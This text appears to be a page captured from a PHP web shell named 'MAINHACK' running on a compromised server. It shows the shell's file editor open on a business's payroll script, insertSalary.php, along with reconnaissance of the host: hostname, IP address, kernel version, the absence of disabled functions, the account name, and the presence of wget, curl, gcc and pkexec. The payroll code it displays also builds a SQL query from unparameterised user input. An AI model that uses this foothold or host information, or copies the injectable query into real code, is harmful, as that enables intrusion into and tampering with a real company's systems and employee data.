[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: insertSalary.php
<?php include("db.php"); $timezome = 'Africa/Africa'; date_default_timezone_set($timezome); $username = $_SESSION['username_Xw211qAAsq4']; $shopname = $_SESSION['business_name_Xw211qAAsq4']; $employee_id = filter_input(INPUT_POST, 'employee_id', FILTER_SANITIZE_STRING); $employee_id = htmlspecialchars($employee_id, ENT_QUOTES, 'UTF-8'); $allowance = filter_input(INPUT_POST, 'allowance', FILTER_SANITIZE_STRING); $allowance = htmlspecialchars($allowance, ENT_QUOTES, 'UTF-8'); $bonus = filter_input(INPUT_POST, 'bonus', FILTER_SANITIZE_STRING); $bonus = htmlspecialchars($bonus, ENT_QUOTES, 'UTF-8'); $monthly_salary = filter_input(INPUT_POST, 'monthly_salary', FILTER_SANITIZE_STRING); $monthly_salary = htmlspecialchars($monthly_salary, ENT_QUOTES, 'UTF-8'); $overtime = filter_input(INPUT_POST, 'overtime', FILTER_SANITIZE_STRING); $overtime = htmlspecialchars($overtime, ENT_QUOTES, 'UTF-8'); $payment_date = filter_input(INPUT_POST, 'payment_date', FILTER_SANITIZE_STRING); $payment_date = htmlspecialchars($payment_date, ENT_QUOTES, 'UTF-8'); $salary_deduction = filter_input(INPUT_POST, 'salary_deduction', FILTER_SANITIZE_STRING); $salary_deduction = htmlspecialchars($salary_deduction, ENT_QUOTES, 'UTF-8'); $reimbursement = filter_input(INPUT_POST, 'reimbursement', FILTER_SANITIZE_STRING); $reimbursement = htmlspecialchars($reimbursement, ENT_QUOTES, 'UTF-8'); $tax_amount = filter_input(INPUT_POST, 'tax_amount', FILTER_SANITIZE_STRING); $tax_amount = htmlspecialchars($tax_amount, ENT_QUOTES, 'UTF-8'); $status = filter_input(INPUT_POST, 'status', FILTER_SANITIZE_STRING); $status = htmlspecialchars($status, ENT_QUOTES, 'UTF-8'); $comment = filter_input(INPUT_POST, 'comment', FILTER_SANITIZE_STRING); $comment = htmlspecialchars($comment, ENT_QUOTES, 'UTF-8'); $sele = mysqli_query($new,"SELECT * FROM employees WHERE employee_id = '$employee_id'"); $conrow = mysqli_fetch_array($sele); $salary = $conrow['monthly_salary']; if(empty($monthly_salary)){ $bsalary = $salary; } else { $bsalary = $monthly_salary; } if(!empty($employee_id)){ $stmt = $con->prepare("insert into payrolls (business_id,emp_id,salary,allowance,bonus,overtime,salary_deduction,reimbursement,tax_amount,date_paid,payment_status,comment) values(?,?,?,?,?,?,?,?,?,?,?,?) "); $stmt->execute(array($shopname,$employee_id,$bsalary,$allowance,$bonus,$overtime,$salary_deduction,$reimbursement,$tax_amount,$payment_date,$status,$comment)); echo json_encode(['status' => 'success', 'message' => 'Payrun is submitted successfully']); exit; } ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.81 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002